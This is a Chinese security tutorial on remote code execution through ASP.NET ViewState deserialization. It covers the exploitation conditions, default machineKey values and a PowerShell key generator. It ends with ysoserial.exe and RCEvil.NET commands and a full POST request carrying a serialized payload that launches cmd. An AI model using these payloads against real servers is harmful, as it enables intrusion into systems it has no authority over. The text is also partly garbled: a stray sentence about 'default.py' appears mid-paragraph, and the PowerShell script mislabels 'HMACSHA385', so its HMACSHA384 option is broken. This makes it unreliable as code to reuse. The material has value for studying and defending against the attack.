利用ViewState在ASP.NET中实现反序列化RCE

gclome

原文链接：利用ViewState在ASP.NET中实现反序列化RCE

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

0x01 简述

ViewState是指在 ASP.NET 应用程序的 WebForms (.aspx) 页面中往返的信息。__VIEWSTATE 字段的 HTML 标记如下所示：

1. <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="..."/>

复制代码

由于 __VIEWSTATE 字段包含用于在回发时重建页面的重要信息，因此请确保攻击者无法篡改此字段。如果攻击者提交恶意的 __VIEWSTATE 负载，则攻击者可能会诱骗应用程序执行本不会执行的操作。ViewState参数是Base64序列化后的，通常会在POST请求中通过名为“__VIEWSTATE”的隐藏参数发送。若要避免此类篡改攻击，可以使用消息验证代码 (MAC) 来保护 __VIEWSTATE 字段。回发时，ASP.NET 会验证与 __VIEWSTATE 负载一起提交的 MAC。

0x02利用条件

1、禁用MAC验证功能
2、掌握以下内容：
（1）.NET Framework 4.5版本之前的验证密钥及其算法；
（2）.NET Framework 4.5或更高版本中的验证密钥、验证算法、解密密钥和解密算法。可以与任意文件读取/下载漏洞一起利用。

0x03 使用MAC签名
以前，只需要将enableViewStateMac属性设置为False，即可禁用MAC验证。在2014年9月，Microsoft发布了一个修补程序，通过忽略所有版本.NET Framework中的这一属性来强制执行MAC验证。实际上，仍然可以通过将AspNetEnforceViewStateMac注册表项设置为0来禁用MAC验证功能：

1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}

复制代码

或者，向web级web.config文件中添加以下设置，也可以禁用MAC验证：

1. <configuration>
   
2. …
   
3.    <appSettings>
   
4.      <add key="aspnet:AllowInsecureDeserialization" value="true" />
   
5.    </appSettings>
   
6. </configuration>

复制代码

在.NET Framework 4.5版本之前，在禁用MAC验证功能时，__VIEWSTATE参数是可以加密的。需要注意的是，大多数扫描器不会尝试发送未经加密的ViewState参数来识别此漏洞。因此，需要进行手动测试，以检查在加密__VIEWSTATE参数时是否禁用了MAC验证。可以通过在__VIEWSTATE参数中发送一个简单的随机Base64字符串来检查这一点。
https://xxx/Default.aspx?__VIEWSTATE=AAAAAA


如果目标页响应错误，那么就证明MAC验证功能已经被禁用，否则就不会显示出错误的消息。如果使用POST请求，那么__VIEWSTATE参数应该位于请求的数据中。由于目标可能不会在外部发送任何请求，因此应该使用在服务器端能产生短暂延迟的Payload。这可以通过执行下面的ASP.NET代码来实现：在新打开的窗口中会自动加载 default.py 的代码

1. System.Threading.Thread.Sleep(10000);

复制代码

可以使用YSoSerial.Net的ActivitySurrogateSelector工具来执行上述代码。

0x04 启用ViewState MAC验证
启用MAC验证功能时，需要在web级配置文件web.config加入machineKey以使用验证和解密密钥及算法。以下是至2014年9月所有版本.NET Framework的默认配置：

1. <machineKey validationKey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" decryptionKey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" validation="SHA1" decryption="AES"  />

复制代码

目前在最新版本的.NET Framework中，默认的验证算法是HMACSHA256。
为了安全起见，许多开发人员使用自己创建的。
对于 ASP.NET 4.0 应用程序只需从 Windows PowerShell 提示符运行Generate-MachineKey即可
对于 ASP.NET 4.0 以上或者更高版本的应用程序可以使用以下 Windows PowerShell 脚本：

1. # 生成一个可复制并粘贴到 Web.config 文件中的 <machineKey> 元素。
   
2. function Generate-MachineKey {
   
3. [CmdletBinding()]
   
4. param (
   
5. [ValidateSet("AES", "DES", "3DES")]
   
6. [string]$decryptionAlgorithm = 'AES',
   
7. [ValidateSet("MD5", "SHA1", "HMACSHA256", "HMACSHA384", "HMACSHA512")]
   
8. [string]$validationAlgorithm = 'HMACSHA256'
   
9. )
   
10. process {
    
11. function BinaryToHex {
    
12. [CmdLetBinding()]
    
13. param($bytes)
    
14. process {
    
15. $builder = new-object System.Text.StringBuilder
    
16. foreach ($b in $bytes) {
    
17. $builder = $builder.AppendFormat([System.Globalization.CultureInfo]::InvariantCulture, "{0:X2}", $b)
    
18.            }
    
19. $builder
    
20.        }
    
21.    }
    
22. switch ($decryptionAlgorithm) {
    
23. "AES" { $decryptionObject = new-object System.Security.Cryptography.AesCryptoServiceProvider }
    
24. "DES" { $decryptionObject = new-object System.Security.Cryptography.DESCryptoServiceProvider }
    
25. "3DES" { $decryptionObject = new-object System.Security.Cryptography.TripleDESCryptoServiceProvider }
    
26.    }
    
27. $decryptionObject.GenerateKey()
    
28. $decryptionKey = BinaryToHex($decryptionObject.Key)
    
29. $decryptionObject.Dispose()
    
30. switch ($validationAlgorithm) {
    
31. "MD5" { $validationObject = new-object System.Security.Cryptography.HMACMD5 }
    
32. "SHA1" { $validationObject = new-object System.Security.Cryptography.HMACSHA1 }
    
33. "HMACSHA256" { $validationObject = new-object System.Security.Cryptography.HMACSHA256 }
    
34. "HMACSHA385" { $validationObject = new-object System.Security.Cryptography.HMACSHA384 }
    
35. "HMACSHA512" { $validationObject = new-object System.Security.Cryptography.HMACSHA512 }
    
36.    }
    
37. $validationKey = BinaryToHex($validationObject.Key)
    
38. $validationObject.Dispose()
    
39. [string]::Format([System.Globalization.CultureInfo]::InvariantCulture,
    
40. "<machineKey decryption=`"{0}`" decryptionKey=`"{1}`" validation=`"{2}`" validationKey=`"{3}`" />",
    
41. $decryptionAlgorithm.ToUpperInvariant(), $decryptionKey,
    
42. $validationAlgorithm.ToUpperInvariant(), $validationKey)
    
43. }
    
44. }

复制代码

由于攻击者无法猜测元素的内容，因此也就无法在试图篡改 __VIEWSTATE 负载时提供有效的 MAC。ASP.NET 会检测到有效的 MAC 没有提供，并拒绝此恶意请求。


0x05 漏洞利用

1. <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />

复制代码

我们可以利用YSoSerial.Net在启用MAC验证时创建ViewState Payload，并且掌握了validationkey，可以与任意文件读取下载漏洞一起利用。
针对.NET Framwork 4.5及以上版本需要--decryptionKey及其算法本次针对.NET Framwork 4.0及以下版本而进行演示

1. ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\tmp\test.txt" --generator=C2EE9ABB --validationalg="SHA1" validationkey="70DBADB.........72FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"

复制代码

使用RCEvil.NET使用HMAC对ysoserial.net payload进行签名：

1. RCEvil.NET.exe -u /Login.aspx -v 70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0 -m SHA1 -p /wEyqQcAAQAAAP////8BAAAAAAAAAA.....................

复制代码

将payload用于post请求：

1. POST /Login.aspx?ReturnUrl=%2f HTTP/1.1
   
2. Host: xxx
   
3. Content-Length: 1588
   
4. Cache-Control: max-age=0
   
5. Origin: http://xxx
   
6. Upgrade-Insecure-Requests: 1
   
7. Content-Type: application/x-www-form-urlencoded
   
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
   
9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
10. Referer: http://xxx/Login.aspx?ReturnUrl=%2f
    
11. Accept-Encoding: gzip, deflate
    
12. Accept-Language: zh-CN,zh;q=0.9
    
13. Cookie: security_level=2; PHPSESSID=xxx ASP.NET_SessionId=xxx
    
14. Connection: close
    
15. __VIEWSTATE=%2fwEylAcAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAA
    
16. Xk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCB
    
17. DdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRl
    
18. MzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGlu
    
19. Zy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRC
    
20. cnVzaAECAAAABgMAAAC2BTw%2feG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9
    
21. InV0Zi04Ij8%2bDQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YX
    
22. J0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2
    
23. NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXR
    
24. pb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczth
    
25. c3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29
    
26. mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5
    
27. PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm
    
28. 9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQ
    
29. XJndW1lbnRzPSIvYyBjYWxjLmV4ZSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ
    
30. 7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZ
    
31. XJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyU
    
32. HJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8%2bDQogICAgICA8L3NkOl
    
33. Byb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmpl
    
34. Y3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U%2bDQo8L09iamVjdERhdG
    
35. FQcm92aWRlcj4LEcCGCz27e3N%2f4WY%2fLsQUUYBCLnjAEyZ62Hu%2fUfd4Ic
    
36. 3kJpTpiyBNbA%3d%3d&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVAL
    
37. IDATION=%2FwEdAAW0o5oWyd3%2BUXUl0wlU4h6eozoJZpuXxkpOVJKRbHyu
    
38. HkPTPkdPWl%2B8YN2NtDCtxiehEKvuPXQE3IwHHll3A7iHzfg78Z8BXhXifTCAVk
    
39. evd%2BckSYc1N1fMSrOnXZTsvUI%2F%2Ff5l5yM0bdtmu8knvjNQ&txtName=a&t
    
40. xtPass=a&Button1=%E7%99%BB%E5%BD%95

复制代码

服务器会弹出500的错误，但攻击其实成功了。